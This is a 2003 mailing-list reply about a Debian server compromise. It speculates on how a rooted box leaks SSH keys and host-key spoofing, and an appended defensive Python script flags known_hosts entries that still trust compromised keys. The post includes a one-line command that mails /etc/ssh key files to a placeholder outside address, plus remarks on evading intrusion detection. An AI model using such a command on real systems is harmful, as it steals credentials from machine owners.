keys - Re: Debian Investigation Report after Server Compromises
On Wed, 3 Dec 2003, Carl Fink wrote:
>
> If the system is rooted, it would be trivial to write a replacement
> for ssh (GPG, etc.) that copies your private keys onto the hard drive
> for later retrieval. Definition of "trivial" is: I, a bad
> programmer, could do it.
why copy and get it later ??
why not have the rootkit you modified do the equivalent of:
for each file...
mail -s "hacked box" your-temp-addy@yahoo.com < /etc/ssh/*
- my understanding ... donno if it's right or not ..
if i copy /etc/ssh/host_keys to my laptop,
when i log into debian host box ( example ) that host
will think my laptop is the debian dev box since i
could be on my laptop with the same host keys
- in which case, don't lose control of your host files
or you're s.o.l.
- i find it hard to believe it's that simple ..
( i haven't tried it though .. to spoof another machine )
- i never did understand why, people wanna run rootkits once they
got in ... ( all it does is trip the various network/host ids )
- leaving the fs intact, as it was, before you got in
will go un-noticed ... but then again, you can't do much
either .. but then again, there are plenty of fun things
one can do secretly.. w/o tripping the ids
- and the problem is if they are sniffing keystrokes... oh well..
all bets are off for security .. there is none ..
- even mouse clicks won't help
- best place to start..
- assume they have root passwd ... now figure out how to
cover yourself ( ie.. protect your data )
c ya
alvin
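
Added example, not part of the original message: once a host's key files may have been copied, the host keys have to be replaced, and every client known_hosts entry that still trusts the old public key has to be found and removed. The Python sketch below flags those entries by fingerprint; the host names, key blobs and the `constructed_key` helper are constructed for illustration and are not real keys.

```python
import base64
import hashlib


def fingerprint(key_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def stale_entries(known_hosts_text: str, compromised: set) -> list:
    """Return (line_no, hosts, fingerprint) for entries still trusting a compromised key."""
    hits = []
    for no, line in enumerate(known_hosts_text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        marker = fields.pop(0) if fields[0].startswith("@") else None
        if marker == "@revoked" or len(fields) < 3:
            continue  # already revoked, or malformed entry
        hosts, _keytype, key_b64 = fields[:3]
        try:
            fp = fingerprint(key_b64)
        except ValueError:
            continue  # key field is not valid base64
        if fp in compromised:
            hits.append((no, hosts, fp))
    return hits


def constructed_key(seed: bytes) -> str:
    """Hypothetical helper: ssh-ed25519 shaped blob from constructed bytes, not a real key."""
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + hashlib.sha256(seed).digest()
    return base64.b64encode(blob).decode()


OLD_KEY = constructed_key(b"old host key")      # key on the host before the compromise
NEW_KEY = constructed_key(b"rotated host key")  # key generated after the reinstall
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed sample known_hosts content",
    f"build.example.org,192.0.2.10 ssh-ed25519 {OLD_KEY}",
    f"mirror.example.org ssh-ed25519 {NEW_KEY}",
    f"@revoked * ssh-ed25519 {OLD_KEY}",
    "broken-line ssh-ed25519",
])

if __name__ == "__main__":
    for no, hosts, fp in stale_entries(SAMPLE_KNOWN_HOSTS, {fingerprint(OLD_KEY)}):
        print(f"line {no}: {hosts} still trusts compromised key {fp}")
```

The fingerprint alone cannot tell a client that a key was stolen, since a copied key presents the same fingerprint; the check only works against a list of keys already known to be compromised.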